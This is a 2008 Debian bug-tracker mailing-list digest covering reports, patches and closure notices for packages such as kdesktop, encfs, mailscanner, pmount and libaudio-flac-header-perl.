This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461912: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461912
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kdesktop
Version: 4:3.5.8.dfsg.1-2
Severity: grave
Tags: security
Justification: user security hole

KDesktop -> Screen Saver Settings 
  Uhr [x]
  Automatisch starten [x] 1 Min. (with or without 'ask for Password', no
matter)

==> /var/log/kdm.log <==
(**) RADEON(0): RADEONSaveScreen(2)
==> /home/x/.xsession-errors <==
kdesktop: WARNING: LockProcess::startSaver() grabInput() failed

manual:
$ dcop kdesktop KScreensaverIface isEnabled  
true
$ dcop kdesktop KScreensaverIface save
==> /home/x/.xsession-errors <==
kdesktop: WARNING: LockProcess::startSaver() grabInput() failed


-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (900, 'testing'), (500, 'testing-proposed-updates'), (500, 
'proposed-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.23-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages kdesktop depends on:
ii  eject   2.1.5-6  ejects CDs and operates CD-Changer
ii  kdebase-bin 4:3.5.8.dfsg.1-2 core binaries for the KDE base mod
ii  kdelibs4c2a 4:3.5.8.dfsg.1-4 core libraries and binaries for al
ii  libart-2.0-22.3.19-3 Library of functions for 2D graphi
ii  libaudio2   1.9.1-1  Network Audio System - shared libr
ii  libc6   2.7-5GNU C Library: Shared libraries
ii  libfontconfig1  2.5.0-2  generic font configuration library
ii  libfreetype62.3.5-1+b1   FreeType 2 font engine, shared lib
ii  libgcc1 1:4.2.2-4GCC support library
ii  libgl1-mesa-glx [libgl1 7.0.2-3  A free implementation of the OpenG
ii  libglu1-mesa [libglu1]  7.0.2-3  The OpenGL utility library (GLU)
ii  libice6 2:1.0.4-1X11 Inter-Client Exchange library
ii  libidn111.1-1GNU libidn library, implementation
ii  libjpeg62   6b-14The Independent JPEG Group's JPEG 
ii  libkonq44:3.5.8.dfsg.1-2 core libraries for Konqueror
ii  libpng12-0  1.2.15~beta5-3   PNG library - runtime
ii  libqt3-mt   3:3.3.7-9Qt GUI Library (Threaded runtime v
ii  libsm6  2:1.0.3-1+b1 X11 Session Management library
ii  libstdc++6  4.2.2-4  The GNU Standard C++ Library v3
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxau6 1:1.0.3-2X11 authorisation library
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxft2 2.1.12-2 FreeType-based font drawing librar
ii  libxi6  2:1.1.3-1X11 Input extension library
ii  libxinerama11:1.0.2-1X11 Xinerama extension library
ii  libxrandr2  2:1.2.2-1X11 RandR extension library
ii  libxrender1 1:0.9.4-1X Rendering Extension client libra
ii  libxss1 1:1.1.2-1X11 Screen Saver extension library
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library
ii  libxxf86misc1   1:1.0.1-2X11 XFree86 miscellaneous extensio
ii  zlib1g  1:1.2.3.3.dfsg-8 compression library - runtime

kdesktop recommends no packages.

-- debconf-show failed


--- End Message ---
--- Begin Message ---
severity 461912 normal
thanks

  Hello Alex:

  As you can see I've reassigned this bug and also the maintainer contacted 
me. In his opinion this problem is much of a FAQ with unclutter.

  The issue is that if you use the -grab option, then unclutter will grab the 
mouse pointer as commanded, hence other sofware relying on this will stop 
working. This cannot be considered as a security issue, since you commanded 
unclutter to act like that.

  In any case and since the explained is the expected unclutter behaviour I'm 
closing this bug as per this explanation and as requested by maintainer.

  Thanks.
--

Bug#450549: Segmentation fault in kxsldbg

2008-02-11 Thread Keith Isdale
Hi Sune, 
On Saturday 26 January 2008 10:44 pm, Sune Vuorela wrote:
> I have tried a bit and quite easily reproduced it.
>
> With the test doc from the sources:
>
> kxsldbg src/kdewebdev-3.5.8/kxsldbg/data/testdoc.xsl
> src/kdewebdev-3.5.8/kxsldbg/data/testdoc.xml /tmp/foo
>
> and pressing "step" icon 2-10 times, then it blow up in a quite nice
> segfault.
...

> I have tested with libxslt 1.1.18 te 1.1.22 and I get the same segfault
> every time.
>
> backtrace from gdb following

Thankyou for these details I will do another build using the version of libxml 
and libxslt mentioned and try again. Sorry for late reply - was on holiday.

I see that it is interesting that gdb reports
 item = (xsltStackElemPtr) 0x39
which can't be right. xsldbg just interates the list of  xsltStackElemPtr 
value should be 0x00 if the end of variable lists is found.


Regards,

--
Keith



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465029: (no subject)

2008-02-11 Thread Matthias Berndt
I also have this problem with virtualbox. Gwenview once popped up an error 
message saying "undefined symbol: stat64" too. 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465312: ipw3945-modules-2.6-686 depends on linux-latest-modules-2.6.22-3-686 not available in repositories

2008-02-11 Thread maximilian attems
On Mon, Feb 11, 2008 at 09:36:07PM +0100, Apelete Seketeli wrote:
> I already knew about the merging and was able to connect using iwlwifi at
> the time the report was wrote. What I was trying to point out is that since
> iwlwifi drivers are lacking many features (powermanagement, wifi led
> support...), wouldn't it be nice to have the choice between ipw3945 and
> iwlwifi with kernel 2.6.24 ?

no ipw3945 is evil and dead, no way we gona support that for Lenny.

if you need amd64 or i386 2.6.25-rc1 trunk snapshots holler.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 464923 is important

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.13
> severity 464923 important
Bug#464923: linux-2.6.18-6-amd64: 3w- v1.26.02.001 causes datacorruption 
with AMD64/EM64T with >2GB RAM
Severity set to `important' from `critical'

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465336: Do not build -- missing dependencies and more

2008-02-11 Thread Klaus Ethgen
Package: encfs
Version: 1.4.1.1-1
Severity: serious
Tags: patch

There are several build issues with the newest version. I fixed it as
you can see in the attaching patch.

1. The build dependency was missing libboost-dev and pkg-config.
2. There was missing -lpthread as libfuse2 has forgotten this. (May be
   not the bug of encfs but this work around is sufficient.)

Please note, this patch is only the interdeff between -1 and my version
-1.1.

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (800, 'stable'), (700, 'testing'), (600, 'unstable'), (60, 
'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/dash
Kernel: Linux 2.4.35.3
Locale: LANG=de_DE, LC_CTYPE=de_DE (charmap=ISO-8859-1) (ignored: LC_ALL set to 
de_DE)

Versions of packages encfs depends on:
ii  fuse-utils 2.7.1-1   Filesystem in USErspace (utilities
ii  libc6  2.3.6.ds1-13etch4 GNU C Library: Shared libraries
ii  libfuse2   2.7.1-1   Filesystem in USErspace library
ii  libgcc11:4.1.1-21GCC support library
ii  librlog1c2a1.3.7-1   flexible message logging library
ii  libssl0.9.80.9.8c-4etch1 SSL shared libraries
ii  libstdc++6 4.1.1-21  The GNU Standard C++ Library v3

encfs recommends no packages.

-- no debconf information

-- 
Klaus Ethgenhttp://www.ethgen.de/
pub  2048R/D1A4EDE5 2000-02-26 Klaus Ethgen <[EMAIL PROTECTED]>
Fingerprint: D7 67 71 C4 99 A6 D4 FE  EA 40 30 57 3C 88 26 2B
diff -u encfs-1.4.1.1/debian/control encfs-1.4.1.1/debian/control
--- encfs-1.4.1.1/debian/control
+++ encfs-1.4.1.1/debian/control
@@ -2,7 +2,7 @@
 Section: utils
 Priority: optional
 Maintainer: Eduard Bloch <[EMAIL PROTECTED]>
-Build-Depends: debhelper (>= 4.0.0), librlog-dev, librlog1c2a, libfuse-dev (>> 2.6), libssl-dev (>> 0.9.8), quilt
+Build-Depends: debhelper (>= 4.0.0), librlog-dev, librlog1c2a, libfuse-dev (>> 2.6), libssl-dev (>> 0.9.8), quilt, libboost-dev, pkg-config
 Standards-Version: 3.7.2
 
 Package: encfs
diff -u encfs-1.4.1.1/debian/rules encfs-1.4.1.1/debian/rules
--- encfs-1.4.1.1/debian/rules
+++ encfs-1.4.1.1/debian/rules
@@ -27,7 +27,7 @@
 config.status: configure $(QUILT_STAMPFN)
 	dh_testdir
 	# Add here commands to configure the package.
-	CFLAGS="$(CFLAGS)" LDFLAGS="-Wl,--as-needed -lulockmgr" ./configure --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info
+	CFLAGS="$(CFLAGS)" LDFLAGS="-Wl,--as-needed -lulockmgr -lpthread" ./configure --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info
 	touch config.status
 
 build: build-stamp
diff -u encfs-1.4.1.1/debian/changelog encfs-1.4.1.1/debian/changelog
--- encfs-1.4.1.1/debian/changelog
+++ encfs-1.4.1.1/debian/changelog
@@ -1,3 +1,11 @@
+encfs (1.4.1.1-1.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Adding build dependencies to libboost-dev.
+  * Fixing pthread issue.
+
+ -- Klaus Ethgen <[EMAIL PROTECTED]>  Mon, 11 Feb 2008 22:43:36 +0100
+
 encfs (1.4.1.1-1) unstable; urgency=low
 
   * New upstream release (closes: #460287)


signature.asc
Description: Digital signature


Bug#465095: mailscanner fails to start with FIELD_NAME not imported

2008-02-11 Thread Lukas Ruf

Hi Somon

Simon Walter wrote:

Hello Lukas,

did you update an old mailscanner installation?



Not recently.  I started using MailScanner about 4 years ago -- but 
being subscribed to unstable, I regularly upgrade.


When I realized the difficulties, I did

apt-get remove --purge mailscanner

apt-get install mailscanner

and restored the /etc/MailScanner I have been adjusting over the years.

The problem could be reproduced on two independent unstable 
installations (one setup on Dec. 27th, 2007, the other in January 2006).


Any idea -- besides going with the virgin /etc/MailScanner?

Thanks.

Lukas

--
Regards
Simon Walter

Lukas Ruf <[EMAIL PROTECTED]> writes:


Package: mailscanner
Version: 4.58.9-2
Severity: grave
Justification: renders package unusable


The following error is reported when I attempt to start mailscanner:

Starting mail spam/virus scanner: MailScannerVariable "$FIELD_NAME" is not 
imported at /usr/share/MailScanner/MailScanner/Message.pm line 6367.
Variable "$FIELD_NAME" is not imported at 
/usr/share/MailScanner/MailScanner/Message.pm line 6370.
Global symbol "$FIELD_NAME" requires explicit package name at 
/usr/share/MailScanner/MailScanner/Message.pm line 6367.
Global symbol "$FIELD_NAME" requires explicit package name at 
/usr/share/MailScanner/MailScanner/Message.pm line 6370.
Compilation failed in require at /usr/sbin/MailScanner line 79.
BEGIN failed--compilation aborted at /usr/sbin/MailScanner line 79.
 failed!
invoke-rc.d: initscript mailscanner, action "start" failed.

Does anybody know how to resolve this problem?

Is it related to the following debconf setting?
  mailscanner/v3_upgrade: Don't upgrade
If so, how can I change that?

Thanks for any support

Kind regards,
Lukas


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.23.9-euphrat (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=en_IE, LC_CTYPE=en_IE (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages mailscanner depends on:
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libarchive-zip-perl 1.18-1   Module for manipulation of ZIP arc
ii  libcompress-zlib-perl   2.008-1  Perl module for creation and manip
ii  libconvert-binhex-perl  1.119+pristine-2 Perl5 module for extracting data f
ii  libconvert-tnef-perl0.17-5   Perl module to read TNEF files
ii  libdbd-sqlite3-perl 1.14-1   Perl DBI driver with a self-contai
ii  libfilesys-df-perl  0.92-3   Module to obtain filesystem disk s
ii  libhtml-parser-perl 3.56-1   A collection of modules that parse
ii  libmime-perl5.425-2  transitional dummy package
ii  libmime-tools-perl [lib 5.425-2  Perl5 modules for MIME-compliant m
ii  libnet-cidr-perl0.11-2   Manipulate IPv4/IPv6 netblocks in
ii  libsys-hostname-long-pe 1.4-1Figure out the long (fully-qualifi
ii  libsys-syslog-perl  0.24-1   Perl interface to the UNIX syslog(
ii  perl5.8.8-12 Larry Wall's Practical Extraction
ii  postfix [mail-transport 2.5.1~rc1-1  High-performance mail transport ag
ii  spamassassin3.2.3-1  Perl-based spam filter using text
ii  ucf 3.004Update Configuration File: preserv
ii  unzip   5.52-10  De-archiver for .zip files

Versions of packages mailscanner recommends:
pn  libnet-cidr-lite-perl  (no description available)
ii  ncftp 2:3.2.1-1  A user-friendly and well-featured
ii  tnef  1.4.3-2Tool to unpack MIME application/ms
ii  wget  1.10.2-3   retrieves files from the web

-- debconf information:
  mailscanner/v3_upgrade: Don't upgrade










--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#464058: turba access checking issue

2008-02-11 Thread Chuck Hagenbuch
Hi Peter - any feedback on the latest patch? Or Gregory, any feedback  
from the debian team? I'd like to get this resolved soon.


Quoting Peter Paul Elfferich <[EMAIL PROTECTED]>:


It's not so much the list's owner as the entry's owner, which could be
another shared address book, so that would turn into:
"This list contains X1 contacts from address book 'Y1' that you do not have
permission to view. Contact the owner (Z1) if you have questions." And so
forth for X2, Y2 and Z2 etc. Where X is the number of contacts, Y is the
name of the source address book and Z1 is the owner of the address book or
share.

Peter Paul

PS: I did another test with an interesting outcome by the way: if the
address added to a list is from a shared address book that another user can
not see/read, then it isn't shown, but it's not removed. So the silent
removal only seems to take place with addresses from private address books.

On Feb 7, 2008 6:38 PM, Chuck Hagenbuch <[EMAIL PROTECTED]> wrote:


Quoting Peter Paul Elfferich <[EMAIL PROTECTED]>:

> That would perhaps be a simpler fix, but I think it will be confusing to
> users.
> If you really want to allow this cross-address-book adding then I'd
suggest
> showing warning messages detailing why a number of contacts could not be
> displayed.

That seems possible - "This list contains X contacts that you do not
have permission to view. Contact the list's owner if you have
questions." or something like that?

-chuck







-chuck




Bug#422800: Same here, also with dovecot

2008-02-11 Thread Matijs van Zuijlen

Øystein Gisnås wrote:

I have seen similar behavior where attempted moving of messages ends
up with message being deleted (or moved to trash) at the source folder
but never ends up at the target folder. There may be various reasons
for that, but any general failure on the target side (think: pull the
plug of the target mailserver) would give this, I think. As long as
Evolution doesn't have proper transaction support for moving email,
this will be more or less a problem. With proper error messages and a
message instance in the trash, the user can cover up for the problem.


Agreed. However, I am connected to my IMAP server over a wired LAN. 
Also, dovecot does log prematurely closed connections, but no such 
events appeared in the logs for these cases.



I will therefore ask you to describe scenarios you have where (a) the
message doesn't end up i trash, or (b) no error message is shown. Try
to make it as easy as possible to reproduce the problem.


No error message was ever shown. In the case where I attempted to move a 
message, it did end up in trash. In the case where I sent a message, no 
copy was preserved anywhere (except in the recipient's mailbox).


It is my impression that the original submitter also saw no error 
messages, but I may be mistaken.


I have just switched to IceDove for my day-to-day email tasks, but I 
will try to set up a dummy account using Evolution to see if I can 
reliably make the problem appear.


Regards,
Matijs van Zuijlen.




Bug#435645: marked as done (pumount does not play nicely with symlinks in /etc/fstab)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 21:17:20 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#435645: fixed in pmount 0.9.17-2
has caused the Debian Bug report #435645,
regarding pumount does not play nicely with symlinks in /etc/fstab
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
435645: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=435645
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Package: eject
Version: 2.1.5-2
Severity: grave

Newer eject refuse to eject a cdrom mounted under /cdrom. This render
this package nearly unusable as this is the major reason the package
exists.

Please readadd ejecting of /cdrom as this is a very common use! The
stable package of this package works well.

- -- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (700, 'testing'), (600, 'unstable'), (500, 'stable'), (60, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.15.1
Locale: LANG=de_DE, LC_CTYPE=de_DE (charmap=ISO-8859-1) (ignored: LC_ALL set to 
de_DE)
Shell: /bin/sh linked to /bin/dash

Versions of packages eject depends on:
ii  libc6 2.6-2  GNU C Library: Shared libraries

eject recommends no packages.

- -- no debconf information

- -- 
Klaus Ethgenhttp://www.ethgen.de/
pub  2048R/D1A4EDE5 2000-02-26 Klaus Ethgen <[EMAIL PROTECTED]>
Fingerprint: D7 67 71 C4 99 A6 D4 FE  EA 40 30 57 3C 88 26 2B
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBRrGvip+OKpjRpO3lAQLTMwgAsaJDsOXe9jyiOVKeFEVVB+stGqgkl6wJ
4KjwYjBxfO/5fYn8kUnWqjAOfDfNXGRMaZ/3XhuDnOhAiw5qJzquVFGO9xghFIbs
KC0FhdYCAHx9Poj1HN2/VXj3k3FAq9/dz81kudGrSVcCQIib1I/4yVlZywDOrgM4
zLpGKpiLPwT/aK0nr96jo8/4IagWO91lHB1tHTDanzXkQ/nRGWo4m2KKRm0Jwyft
Lz7KbxKy7pf+2iw9ioGhoafwVNvelwqERQ69og8Tdl/FtXKCtOMvm8NUgU2E3OWR
n2IqkOx5Hsc5Jt0UKLpbCYgZqhfdUo008IASsprGh0BaUFWVzqODIw==
=sPKV
-END PGP SIGNATURE-

--- End Message ---
--- Begin Message ---
Source: pmount
Source-Version: 0.9.17-2

We believe that the bug you reported is fixed in the latest version of
pmount, which is due to be installed in the Debian FTP archive:

pmount_0.9.17-2.diff.gz
  to pool/main/p/pmount/pmount_0.9.17-2.diff.gz
pmount_0.9.17-2.dsc
  to pool/main/p/pmount/pmount_0.9.17-2.dsc
pmount_0.9.17-2_amd64.deb
  to pool/main/p/pmount/pmount_0.9.17-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Vincent Fourmond <[EMAIL PROTECTED]> (supplier of updated pmount package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 21:50:05 +0100
Source: pmount
Binary: pmount
Architecture: source amd64
Version: 0.9.17-2
Distribution: unstable
Urgency: medium
Maintainer: Vincent Fourmond <[EMAIL PROTECTED]>
Changed-By: Vincent Fourmond <[EMAIL PROTECTED]>
Description: 
 pmount - mount removable devices as normal user
Closes: 435645
Changes: 
 pmount (0.9.17-2) unstable; urgency=medium
 .
   * Finally fix the problems with symlinks in fstab (closes: #435645), with
 patch 10-finally-fix-fstab-devices
   * Urgency medium to fix RC bug in testing
Files: 
 306e762f7471bbd58316f3d3518867bd 671 utils optional pmount_0.9.17-2.dsc
 eba08f8af8b52fd23015854b3cf2c902 8458 utils optional pmount_0.9.17-2.diff.gz
 2ae62713ccba158775f5dc0ac654a5f8 114604 utils optional 
pmount_0.9.17-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsLmCx/UhwSKygsoRAnrnAJ45dIYTZTBlxY6V8Ax0wWcJ5ZCgqQCgvsQ4
A/kF3k9zl5BhD5nM4krzOsM=
=K3vX
-END PGP SIGNATURE-


--- End Message ---


Processed: [bts-link] source package aria2

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> #
> # bts-link upstream status pull for source package aria2
> # see http://lists.debian.org/debian-devel-announce/2006/05/msg1.html
> #
> user [EMAIL PROTECTED]
Setting user to [EMAIL PROTECTED] (was [EMAIL PROTECTED]).
> # remote status report for #455282
> #  * 
> http://sourceforge.net/tracker/?func=detail&atid=813673&aid=1880564&group_id=159897
> #  * remote status changed: Open -> Pending
> usertags 455282 - status-Open
Bug#455282: FTBFS with GCC 4.3: missing #includes
Usertags were: status-Open.
Usertags are now: .
> usertags 455282 + status-Pending
Bug#455282: FTBFS with GCC 4.3: missing #includes
There were no usertags set.
Usertags are now: status-Pending.
> # remote status report for #462762
> #  * 
> http://sourceforge.net/tracker/?func=detail&atid=813673&aid=1880673&group_id=159897
> #  * remote status changed: Open -> Closed
> #  * closed upstream
> tags 462762 + fixed-upstream
Bug#462762: file conflicts, includes locale-alias??
There were no tags set.
Tags added: fixed-upstream

> usertags 462762 - status-Open
Bug#462762: file conflicts, includes locale-alias??
Usertags were: status-Open.
Usertags are now: .
> usertags 462762 + status-Closed
Bug#462762: file conflicts, includes locale-alias??
There were no usertags set.
Usertags are now: status-Closed.
> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#462851: marked as done (debian-edu - FTBFS: dpkg-genchanges: failure: cannot read files list file: No such file or directory)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 22:14:29 +0100
with message-id <[EMAIL PROTECTED]>
and subject line forgot to mention in changelog
has caused the Debian Bug report #462851,
regarding debian-edu - FTBFS: dpkg-genchanges: failure: cannot read files list 
file: No such file or directory
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
462851: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=462851
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: debian-edu
Version: 0.824
Severity: serious

There was an error while trying to autobuild your package:

> Automatic build of debian-edu_0.824 on debian-31.osdl.marist.edu by 
> sbuild/s390 98
[...]
> dh_install debian-edu-tasks.desc usr/share/tasksel
>  dpkg-genchanges -B -ms390 Build Daemon  
> >../debian-edu_0.824_s390.changes
> dpkg-genchanges: arch-specific upload - not including arch-independent 
> packages
> dpkg-genchanges: failure: cannot read files list file: No such file or 
> directory
> dpkg-buildpackage: failure: dpkg-genchanges gave error exit status 2
> **
> Build finished at 20080124-0422
> FAILED [dpkg-buildpackage died]


--- End Message ---
--- Begin Message ---
This should be fixed within the newest upload 0.824+svn40294

Greetings
Winnie

-- 
 .''`.   Patrick Winnertz <[EMAIL PROTECTED]>
:  :' :  GNU/Linux Debian Developer
`. `'`   http://www.der-winnie.de http://people.skolelinux.org/~winnie
  `-  Debian - when you have better things to do than fixing systems


signature.asc
Description: This is a digitally signed message part.
--- End Message ---


Bug#462249: marked as done (libaudio-flac-header-perl: FTBFS on armel, hppa, m68k, powerpc, s390, sparc)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 21:02:07 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#462249: fixed in libaudio-flac-header-perl 1.9-2
has caused the Debian Bug report #462249,
regarding libaudio-flac-header-perl: FTBFS on armel, hppa, m68k, powerpc, s390, 
sparc
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
462249: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=462249
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libaudio-flac-header-perl
Version: 1.9-1
Severity: serious
Justification: no longer builds from source


Since the architectures where testsuite fails have little in common,
it could be that this bug is a bug in the testsuite rather than
testsuite exposing bugs in libaudio-flac-header-perl code.

Likely the testsuite is expecting something from the environment
where it is being run, which is true on some buildd's but not on all.

buildd logs:

http://buildd.debian.org/pkg.cgi?pkg=libaudio-flac-header-perl

make[1]: Entering directory `/build/buildd/libaudio-flac-header-perl-1.9'
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0, 
'inc', 'blib/lib', 'blib/arch')" t/application-id.t t/basic.t t/id3tagged.t 
t/md5.t t/picture.t t/pod-coverage.t t/pod.t t/write.t
t/application-idok
t/basic.
#   Failed test in t/basic.t at line 56.

#   Failed test in t/basic.t at line 57.
# Looks like you failed 2 tests of 33.
dubious
Test returned status 2 (wstat 512, 0x200)
DIED. FAILED tests 32-33
Failed 2/33 tests, 93.94% okay
t/id3tagged.ok
t/md5...ok
t/picture...ok
t/pod-coverage..ok
t/pod...ok
t/write.ok
Failed Test Stat Wstat Total Fail  Failed  List of Failed
---
t/basic.t  2   512332   6.06%  32-33
Failed 1/8 test scripts, 87.50% okay. 2/76 subtests failed, 97.37% okay.
make[1]: *** [test_dynamic] Error 255


-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.20.4
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)


--- End Message ---
--- Begin Message ---
Source: libaudio-flac-header-perl
Source-Version: 1.9-2

We believe that the bug you reported is fixed in the latest version of
libaudio-flac-header-perl, which is due to be installed in the Debian FTP 
archive:

libaudio-flac-header-perl_1.9-2.diff.gz
  to 
pool/main/liba/libaudio-flac-header-perl/libaudio-flac-header-perl_1.9-2.diff.gz
libaudio-flac-header-perl_1.9-2.dsc
  to 
pool/main/liba/libaudio-flac-header-perl/libaudio-flac-header-perl_1.9-2.dsc
libaudio-flac-header-perl_1.9-2_amd64.deb
  to 
pool/main/liba/libaudio-flac-header-perl/libaudio-flac-header-perl_1.9-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Niko Tyni <[EMAIL PROTECTED]> (supplier of updated libaudio-flac-header-perl 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 20:46:31 +0200
Source: libaudio-flac-header-perl
Binary: libaudio-flac-header-perl
Architecture: source amd64
Version: 1.9-2
Distribution: unstable
Urgency: low
Maintainer: Debian Perl Group <[EMAIL PROTECTED]>
Changed-By: Niko Tyni <[EMAIL PROTECTED]>
Description: 
 libaudio-flac-header-perl - Perl interface to FLAC file header metadata
Closes: 462249
Changes: 
 libaudio-flac-header-perl (1.9-2) unstable; urgency=low
 .
   * debian/patches/uint64: fix FTBFS due to 64-bit integer proglems on
several 32-bit architectures. (Closes: #462249)
   * Remove the unnecessary Debian revision -1 from the libflac-dev
 build-dependency to ease backporting. Thanks, lintian.
Files: 
 a9282fb19d9059b9e22db36bd5be3933 797 perl optional 
libaudio-flac-header-perl_1.9-2.dsc
 e894e1eefa886250f6e275c9cb0737f1 4698 perl optional 
libaudio-flac-header-perl_1.9-2.diff.gz
 597becbf2de7a738953eccf28deb53f9 27912 perl optional 
libaudio-flac-header-perl_1.9-2_amd64.deb

-BEGIN PGP SIGNATUR

Bug#465312: ipw3945-modules-2.6-686 depends on linux-latest-modules-2.6.22-3-686 not available in repositories

2008-02-11 Thread Apelete Seketeli
>how about you do a *little* research before doing *big* fingerpointing.
>iwlwifi is merged and operational, see
>http://wiki.debian.org/iwlwifi 
>
>closing

I already knew about the merging and was able to connect using iwlwifi at
the time the report was wrote. What I was trying to point out is that since
iwlwifi drivers are lacking many features (powermanagement, wifi led
support...), wouldn't it be nice to have the choice between ipw3945 and
iwlwifi with kernel 2.6.24 ?

Regards.
-- 
Apelete Seketeli <[EMAIL PROTECTED]>


Bug#459281: Still present with recent gcj

2008-02-11 Thread Michael Koch
severity 459281 important
forwarded 459281 http://gcc.gnu.org/bugzilla/show_bug.cgi?id=35168
thanks

On Mon, Feb 11, 2008 at 09:18:06PM +0100, Michael Koch wrote:
> On Mon, Feb 11, 2008 at 07:42:41PM +0100, Vincent Fourmond wrote:
> > 
> >   Hello,
> > 
> > Michael Koch wrote:
> > > On Mon, Feb 04, 2008 at 10:19:26AM +0100, Vincent Fourmond wrote:
> > >>   For information, libjfreechart-java still does not work with gcj
> > >> 4.3-20080202-1.
> > > 
> > > I have tested 4.3-20080116-1 and 4.3-20080202-1 locally and both worked.
> > > The generated image is slightly different to the one generated by SUN
> > > but that was to be expected.
> > >
> > > I wonder if you missed the libgcj9-0-awt package in your installation?
> > 
